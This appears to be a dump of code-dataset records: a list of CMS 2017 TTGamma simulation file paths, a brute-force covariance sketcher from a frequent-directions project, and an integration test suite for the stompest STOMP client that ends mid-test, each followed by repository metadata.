'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7BC9D945-CC67-1747-8684-87430F96675C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7CBF2F34-2FB5-6042-8F9C-AF9B739F5F68.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7E39A5FB-303A-CE44-878D-5FD31CCAF56E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7E3E7A04-2518-8049-8306-2E47440BE03B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7EE3170D-7EB6-D24A-A66F-8D17AEA997BB.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7F47D1B5-0EB4-0B44-8C03-C3CCF057CB0E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7F774269-4E11-454C-B65C-5E19F27CEEF6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/83BD6D39-20DC-AE4A-93CE-A0604AB1BE55.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8630EF2E-9EC6-9946-982E-A4C157B5B7A9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/86D0FB68-F7A2-2649-9E6B-2D49A482BA95.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8C2DA017-400F-224D-95DE-9824DCECE98E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8F4777F6-DEF7-A545-A32C-6315B6772486.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9255A4BB-EF3C-ED4D-811F-0768C19CB5A9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9339D244-3F3B-484F-983B-6FF921C669AC.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/944EFD7D-54B4-D64B-B44D-E6C1B3B936A4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9483732B-D0D2-6E4B-9E9E-E0B8ABE1F031.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9628BD9C-6E4E-E548-B4F0-3B4ABC4BB261.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/96CF3650-77A0-3649-9F80-B3F09B0A9F8A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/98D8E852-ED3C-E54A-80BA-DE8B98C37398.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9ACAC3C2-0B25-5C4E-9220-71530D28E4C9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9B8AEEF5-7D1C-E243-92C8-1EC1CFC27BBE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9DCF6A19-0565-024C-8DFD-F7619413DEA7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9E70111A-8B9B-504D-B28A-93C6E009FA06.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9EBF7D46-AFB9-1F4B-83F0-639F135B7918.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A1ECB0DB-D3FF-A741-9AFC-D0DF8BA9DA6C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A367897E-1FAE-E847-B9BC-6EE067CB7ACA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A3CD50BE-2200-7146-9EF8-2E44BC3FB1CC.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AB255731-385F-BB40-89C3-405BE139B458.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AD3C4FE4-B1BF-EC44-976F-09DF59154E3E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AF7A6431-2EC1-AF41-9103-F846648CB826.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B545C91E-270A-5C41-937C-C673BF91D2E2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B60045B1-6FB1-384C-AE91-E939DF2591E9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B7B5DC5A-9FFF-2348-9EBB-95F36B8D5673.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B86E9CE7-6F5A-9049-8522-236ED9AA7181.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B92BBBB5-2EB9-544B-A685-9C5FB4A148CA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B98FDA60-5B9D-A043-A84B-80E58A9C6AC8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/BC8E5998-3F71-5842-8630-F18439372DA1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/BCCC85C1-8063-5A47-97AC-FDAC23A9E43D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C14BBECC-3244-3E4E-A079-497DBA522F24.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C2C0EEA6-27F7-CE41-B71D-37C1C8BF3B47.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C58D362D-147D-F74E-88AA-891258127F5E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C712065D-B57D-CB40-AB8F-34A3EBEC3C67.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C8C07EEB-B704-AC48-BE36-0624A80D8376.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C98D99FC-02C6-4147-8F5E-B46EC5B0595D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CAC8883D-8927-6549-B09D-AFE5A9AF7C6B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CBB7E645-8D71-5342-BCE9-D6DB4EDD4011.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CCACB17A-7EC8-2947-BF9B-B7EB9C100DE7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CCC3DFE9-387E-B24E-B6C5-8FCC0E6509C4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CE57397B-195D-0344-A02D-5A20DA469F89.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D20B7A34-61CC-1244-A837-B91344F18709.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D2536683-026F-FB4C-93DB-D506582625A7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D2B8F723-A16F-A14A-A631-9435E970B01E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D3F4F9F3-8153-4545-8F27-389AAF65512F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D486B0A5-374D-5C46-836C-090ACF060682.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4971DD8-0764-394F-AA84-93825254B832.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4AF7D3E-44BA-FB42-961D-8A7492E3140E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4CBF585-C586-A14E-AEF2-786097584A7A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D524DE0C-884B-4147-B79F-195AFD52EBF8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D7D6C945-6F4B-6547-A9DA-9593B1C65863.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D96BBAFF-ACAF-7B4B-A277-0C6B0DFE03EE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D99AD1D0-4E23-5B41-8B39-1DA3AB4DF5AA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DAB41616-4FC2-C64D-BBB6-EA332F662005.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DAD25896-8067-FC47-87A4-D4A41C75143E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DC95735D-A3C6-F94E-AFE0-B0C05F5C65D4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E10EF7C2-4F65-E74E-BE5C-ECCC58300813.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E23D0003-7D66-904B-8D7B-659913353094.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E2932D79-4F07-F74C-8951-E76E964FF337.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E3366E88-506E-864D-8EB0-89597FBD8C7C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E6AF960D-B1BD-4243-9032-FF89345A8E2B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E6DE11A5-9C8D-AF44-9D03-10275BF74E1C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E736C29B-E99F-9C41-B331-9C49BAD77CA0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E77EFD29-F90B-8444-A5FE-875B733F4F7A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E8DACCEA-3E32-7848-B47F-D7A5AB2FD70B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E94E464D-7863-F343-89AC-979DAD8737A6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EB852FB0-60E0-3A42-872A-E79AB497E05B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EDE432D0-A649-C943-8C8E-B7A4F4F866EE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EEB244CE-3042-804A-A2DA-233EFEAF91A5.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F028EE1D-9CA9-D34B-8249-2E2F71CCD97D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F4876263-09B5-344F-A218-ACC6284C325F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F559302D-0CE2-3E49-AE93-D8AE26CBD03C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F7780C0A-61CB-9147-B26B-16192EA5A9F9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FBEA71D1-1339-0445-A7F8-CE8580DC595E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FE742668-1A9C-8D43-AB59-22B7885B15E9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FE999DD6-166D-8044-A406-27FC27DB091D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/272686A0-A7C8-754A-A8D3-5370DE966BC8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/2B9C8E72-3983-2448-9165-DDCB1E9AF1C2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/47C3EE8E-EC34-4942-B581-BD3A3A5C39BF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/60064A3B-D343-C44A-9106-F4EB0A38FBA1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/616D7EAA-1890-A84D-A3D4-CFA0ADD930FF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/D2D0F93D-E08C-8B41-B5DD-48A0E56E9742.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/70000/1245718C-A726-D543-B2C5-304FAB911516.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/70000/48D8FBBB-C840-F744-BEE3-28119A29E0F4.root',
] )
| [
"noreply@github.com"
] | TreeMaker.noreply@github.com |
3d5501511af19c7e3c24a15ae0a8a668515257fe | 7969d4408b27d49f949b407ac1c2eeba3cd9996f | /frequent_directions_experiments/bruteForce.py | f49c56c940bdf4b27542e94da703dbf699ccc272 | [] | no_license | edoliberty/frequent-directions-experiments | 0a6593a5a8828fcb0bb3bf57b18e3a33fcbfd21a | 06ecc4a1513c9b83c0bda3de1d2cb5ded468e3a0 | refs/heads/master | 2022-06-09T01:51:16.488978 | 2022-05-16T20:28:08 | 2022-05-16T20:28:08 | 36,439,647 | 15 | 8 | null | 2022-05-16T20:28:09 | 2015-05-28T13:20:14 | C | UTF-8 | Python | false | false | 577 | py | from __future__ import absolute_import
from numpy import zeros, dot, outer, diag, sqrt
from numpy.linalg import svd
from .matrixSketcherBase import MatrixSketcherBase
class BruteForce(MatrixSketcherBase):
def __init__(self, d, ell):
self.d = d
self.ell = ell
self.class_name = "BruteForce"
self.covariance = zeros((self.d, self.d))
def append(self, vector):
self.covariance += outer(vector, vector)
def get(self):
(U, s, Vt) = svd(self.covariance)
return dot(diag(sqrt(s[: self.ell])), Vt[: self.ell, :])
| [
"jvavrek@lbl.gov"
] | jvavrek@lbl.gov |
7c2200026809c256c5b8b30d281fe34c0f836b37 | 8297c454dbbfd4307d454bf25dde713f3af5407e | /stompest/tests/sync_client_integration_test.py | 06a296691f1b9816edb6cdc3019a62e7e9a1a8fe | [] | no_license | irdetoakinavci/jbpm-integration-automation | cd3a19ab5ff60a9d73e36f704b459b2c5af9e687 | 0ce346fc955df19920090d1069670b43d588a6d9 | refs/heads/master | 2021-01-10T10:20:29.269353 | 2013-02-28T14:22:23 | 2013-02-28T14:22:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,555 | py | import logging
import unittest
from stompest.config import StompConfig
from stompest.error import StompConnectionError
from stompest.protocol import commands, StompFrame, StompSpec
from stompest.sync import Stomp
import time
logging.basicConfig(level=logging.DEBUG)
LOG_CATEGORY = __name__
from . import HOST, PORT, VERSION, LOGIN, PASSCODE, VIRTUALHOST, BROKER
class SimpleStompIntegrationTest(unittest.TestCase):
DESTINATION = '/queue/stompUnitTest'
TIMEOUT = 0.1
log = logging.getLogger(LOG_CATEGORY)
def getConfig(self, version, port=PORT):
return StompConfig('tcp://%s:%s' % (HOST, port), login=LOGIN, passcode=PASSCODE, version=version)
def setUp(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'auto'})
client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 'bla', StompSpec.ACK_HEADER: 'auto'})
while client.canRead(self.TIMEOUT):
frame = client.receiveFrame()
self.log.debug('Dequeued old %s' % frame.info())
client.disconnect()
def test_1_integration(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.send(self.DESTINATION, 'test message 2')
self.assertFalse(client.canRead(self.TIMEOUT))
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
def test_2_transaction(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'client-individual'})
self.assertFalse(client.canRead(self.TIMEOUT))
with client.transaction(4711) as transaction:
self.assertEquals(transaction, '4711')
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
self.assertFalse(client.canRead(0))
self.assertTrue(client.canRead(self.TIMEOUT))
frame = client.receiveFrame()
self.assertEquals(frame.body, 'test message')
client.ack(frame)
with client.transaction(4713, receipt='4712') as transaction:
self.assertEquals(transaction, '4713')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712-begin'}))
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
client.send(self.DESTINATION, 'test message without transaction')
self.assertTrue(client.canRead(self.TIMEOUT))
frame = client.receiveFrame()
self.assertEquals(frame.body, 'test message without transaction')
client.ack(frame)
self.assertFalse(client.canRead(0))
frames = [client.receiveFrame() for _ in xrange(2)]
frames = list(sorted(frames, key=lambda f: f.command))
frame = frames[0]
client.ack(frame)
self.assertEquals(frame.body, 'test message')
frame = frames[1]
self.assertEquals(frame, StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712-commit'}))
try:
with client.transaction(4714) as transaction:
self.assertEquals(transaction, '4714')
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
raise RuntimeError('poof')
except RuntimeError as e:
self.assertEquals(str(e), 'poof')
else:
raise
self.assertFalse(client.canRead(self.TIMEOUT))
client.disconnect()
def test_3_timeout(self):
timeout = 0.2
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61613)?startupMaxReconnectAttempts=1,randomize=false', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0))
client.connect(host=VIRTUALHOST, connectTimeout=timeout)
client.disconnect()
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61611)?startupMaxReconnectAttempts=1,backOffMultiplier=3', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0))
self.assertRaises(StompConnectionError, client.connect, host=VIRTUALHOST, connectTimeout=timeout)
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61613)?randomize=false', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0)) # default is startupMaxReconnectAttempts = 0
self.assertRaises(StompConnectionError, client.connect, host=VIRTUALHOST, connectTimeout=timeout)
def test_3_socket_failure_and_replay(self):
client = Stomp(self.getConfig(StompSpec.VERSION_1_0))
client.connect(host=VIRTUALHOST)
headers = {StompSpec.ACK_HEADER: 'client-individual'}
token = client.subscribe(self.DESTINATION, headers)
client.sendFrame(StompFrame('DISCONNECT')) # DISCONNECT frame is out-of-band, as far as the session is concerned -> unexpected disconnect
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.ack(client.receiveFrame())
client.unsubscribe(token)
headers = {'id': 'bla', StompSpec.ACK_HEADER: 'client-individual'}
client.subscribe(self.DESTINATION, headers)
headers[StompSpec.DESTINATION_HEADER] = self.DESTINATION
client.sendFrame(StompFrame('DISCONNECT')) # DISCONNECT frame is out-of-band, as far as the session is concerned -> unexpected disconnect
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 2')
client.ack(client.receiveFrame())
client.unsubscribe(('id', 'bla'))
client.disconnect()
def test_4_integration_stomp_1_1(self):
if StompSpec.VERSION_1_1 not in commands.versions(VERSION):
print 'This broker does not support STOMP protocol version 1.1'
return
client = Stomp(self.getConfig(StompSpec.VERSION_1_1))
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.send(self.DESTINATION, 'test message 2')
self.assertFalse(client.canRead(self.TIMEOUT))
token = client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 4711, StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
client.unsubscribe(token)
client.send(self.DESTINATION, 'test message 3', receipt='4711')
